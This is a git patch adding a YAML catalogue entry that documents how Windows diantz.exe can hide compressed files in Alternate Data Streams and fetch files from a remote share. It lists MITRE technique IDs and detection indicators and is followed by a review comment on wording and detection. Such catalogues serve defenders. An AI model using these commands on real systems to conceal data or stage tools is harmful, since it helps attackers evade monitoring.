From 4db780e0f0b2e2bb8cb1fa13e09196da9b9f1834 Mon Sep 17 00:00:00 2001 From: Tamirye <34610125+Tamirye@users.noreply.github.com> Date: Sat, 8 Aug 2020 15:09:53 +0300 Subject: [PATCH] Create diantz.yml use diantz.exe to download and compress a binary file from a remote server\internet or use it to store file in Alternate data stream. --- yml/OSBinaries/diantz.yml | 39 +++++++++++++++++++++++++++++++++++++++ 1 file changed, 39 insertions(+) create mode 100644 yml/OSBinaries/diantz.yml diff --git a/yml/OSBinaries/diantz.yml b/yml/OSBinaries/diantz.yml new file mode 100644 index 0000000..a79ecc3 --- /dev/null +++ b/yml/OSBinaries/diantz.yml 
@@ -0,0 +1,39 @@ + +--- +Name: diantz.exe +Description: Binary that package existing files into a cabinet (.cab) file +Author: Tamir Yehuda +Created: 08/08/2020 +Commands: + - Command: diantz.exe c:\pathToFile\file.exe c:\destinationFolder\targetFile.txt:targetFile.cab + Description: Compress taget file into a cab file stored in the Alternate Data Stream (ADS) of the target file. + Usecase: Hide data compressed into an Alternate Data Stream. + Category: ADS + Privileges: User + MitreID: T1096 + MitreLink: https://attack.mitre.org/wiki/Technique/T1096 + OperatingSystem: Windows XP, Windows vista, Windows 7, Windows 8, Windows 8.1. + - Command: diantz.exe \\remotemachine\pathToFile\file.exe c:\destinationFolder\file.cab + Description: Download and compress a remote file and store it in a cab file on local machine. + Usecase: Download and compress into a cab file. + Category: Download + Privileges: User + MitreID: T1105 + MitreLink: https://attack.mitre.org/wiki/Technique/T1105 + OperatingSystem: Windows XP, Windows vista, Windows 7, Windows 8, Windows 8.1. +Full_Path: + - Path: c:\windows\system32\diantz.exe + - Path: c:\windows\syswow64\diantz.exe +Code_Sample: + - Code: +Detection: + - IOC: diantz storing data into alternate data streams. + - IOC: diantz getting a file from a remote machine or the internet. +Resources: + - Link: https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/diantz +Acknowledgement: + - Person: Tamir Yehuda + Handle: @tim8288 + - Person: Hai Vaknin + Handle: @vakninhai +---
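Review bot: the `Code_Sample:` block carries an empty `- Code:` entry and the two `Detection:` IOCs are too vague to be actionable; either drop the empty `Code_Sample` item or fill it, and rephrase the IOCs as the concrete command-line shapes the two `Command:` lines already imply, e.g. `diantz.exe` invoked with a UNC (`\\host\...`) source path, or with a destination argument containing a colon after the file name (`targetFile.txt:targetFile.cab`), which is what marks an Alternate Data Stream write. Smaller points in the same hunk: `Description: Binary that package existing files` should read `packages`, `Compress taget file` should read `target`, `Windows vista` should be capitalised `Windows Vista`, and the `OperatingSystem:` values end with a trailing period that other entries in the repository do not use; the list also stops at Windows 8.1, so please confirm whether the binary was checked on later versions and extend or leave the list accordingly. The `MitreLink:` values use the old `attack.mitre.org/wiki/Technique/` URL form; check that both IDs and links still resolve on the current ATT&CK site before merge. Finally, the file opens with a blank line before `---` and closes with a second `---`, which starts a new, empty YAML document; a single leading `---` is enough.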